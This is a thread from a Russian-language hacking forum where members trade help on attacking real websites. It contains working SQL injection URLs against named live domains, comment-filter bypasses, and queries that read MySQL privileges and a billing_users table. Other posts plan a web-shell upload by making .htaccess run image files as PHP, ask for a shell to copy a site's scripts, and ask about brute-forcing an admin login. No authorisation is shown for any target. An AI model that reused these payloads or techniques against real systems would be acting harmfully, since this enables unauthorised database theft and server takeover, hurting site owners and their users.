Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
     
    1 person likes this.
  2. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    что-то фантазии не хвататет:

    http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
     
  3. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Это MSSQL, скорее всего фильтруется, потому что при 1 or 1=@@version-- просто становится недоступен сайт
     
  4. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    b82a комментарий если убрать, то доступен, вылетает ошибка
     
  5. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    значит фильтруется --
     
  6. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    попробуй:
    #
    %-%-
    %2D%2D
     
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9+--+

    file_priv:Y

    Не могу найти админку, phpmyadmin или ftp.
    Не могу прочитать файлы чтобы найти путь куда залить shell.

    Что можете посоветовать?
     
  8. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    нет не блинд....
    причины:
    1)таблица находится в другой базе
    2)таблица пустая
    3)проблемы с кодировками

    решение:
    1)придется смириться
    2)для mysql4
    ' UNION SELECT 1, count(*) FROM billing_users--
    для mysql5
    ' UNION SELECT 1, table_rows FROM information_schema.tables where table_name= 'billing_users'--
    если вывело 0 значит таблица пустая
    3)' UNION SELECT 1, unhex(hex(login)) FROM billing_users LIMIT 0,1 --
    ' UNION SELECT 1, aes_decrypt(aes_encrypt(login,12),12) FROM billing_users LIMIT 0,1 --
     
  9. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    можно с BENCHMARK поколдовать чтоб вывело полный путь
     
  10. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    нету у тебя там файл_прива, дядя

    http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(':',user(),user,file_priv),6,7,8,9 from mysql.user where user='tecmath'--+
    tecmath@localhost:tecmath:N
     
  11. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Здравствуйте всем!
    Sql-inj начал заниматься недавно, всё очень хорошо получается, но возник вопрос есть ли софт, который может помочь сдампипть базу через inj?
     
  12. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Тебе под MySql или MSSql?
     
    1 person likes this.
  13. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Расскажи про ту и ту базу если не сложно.
     
  14. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    При твоем запросе вылетает ошибка "Microsoft VBScript runtime error '800a000d' ". Это означает, что используется Microsoft Jet Database Engine и запросы передается на очень низком уровне, на которые вряд ли получится повлиять.

    Для EoGeneo:
    https://forum.antichat.ru/showpost.php?p=236188&postcount=3 - автоматический частичный\полный дампинг БД (mssql, mysql-5.*)
    и тут еще
    https://forum.antichat.ru/thread148915.html как одни из многих функций есть и дампинг
     
    #12694 mr.celt, 6 May 2010
    Last edited: 6 May 2010
  15. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    Подскажите плиз, делаю всё как тут http://bug-track.ru/showpost.php?p=49&postcount=1

    т.е. имеется аплоадер файлов, + phpinfo()

    upload php запрещён. но я могу заливать любые другие файлы
    и .htaccess, я вставил туда AddType application/x-httpd-php .html .gif

    но сервер не выполняет как php, а отдаёт файл на закачку. ещё в phpinfo сказано что php подключен как CGI, может поэтому не раб? тода подсажите плиз как в CGI PHP подрубить другие расширрнеия с помощью .htaccess
     
    #12695 scorpic393, 6 May 2010
    Last edited: 6 May 2010
  16. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    скорей всего, причиной является хтацесс с php_flag engine off
     
    1 person likes this.
  17. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    спс, может быть. ша поишу инклудов в двиге, токо трабла в том как слить сайт полность (скрипты)

    подскажите плиз шелл или скрипт чтобы слить скрипты с сайта, wso2.4 не пакует в архив ((
     
  18. ReckouNT

    ReckouNT New Member

    Joined:
    16 Jan 2009
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Нужно поломать сайт с аунтификацией такого вида а-ля alert (JS). На вид подумал что сама аунтификация довольно старая, и возможно есть уязвимости.

    Пикча формы, на фоне - страница, открывающаяся после неуспешного входа (адреса счел нужным скрыть)
    http://s58.radikal.ru/i160/1005/34/9cb26e6c3bc2.png

    Такая штука отображается при доступе к фаилу http://site/admin.php. На пхп фаил не похоже, судя по форме неудачи, прописано где то в апаче.

    brutus-aet2 ом прогонять пробовал, выдает бред при разных настройках. По словарю он выдает каждый раз новые пароли, по подбору - тоже.

    Спасибо.

    ЗЫ: Поиск юзал. Просьба постить только по теме.
    ЗЗЫ: Если запостил тему не в том разделе, просьба переместить и отправить ссылку в ЛС.
    ЗЗЗЫ: Ломаю не ради интереса и не ради того, чтобы "нагадить".
     
  19. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Пишу в .htaccess
    , и все равно выполняеться код пхп! Как решить?
     
  20. Hero1n

    Hero1n Member

    Joined:
    11 Nov 2008
    Messages:
    9
    Likes Received:
    6
    Reputations:
    1

    мдаааа, ты уже топик вроде создавал, и тебе там совершенно ясно ответили, зачем здесь пишешь?!
    http://en.wikipedia.org/wiki/Basic_access_authentication
    alert() тут не причём, это не javascript.
     
Thread Status:
Not open for further replies.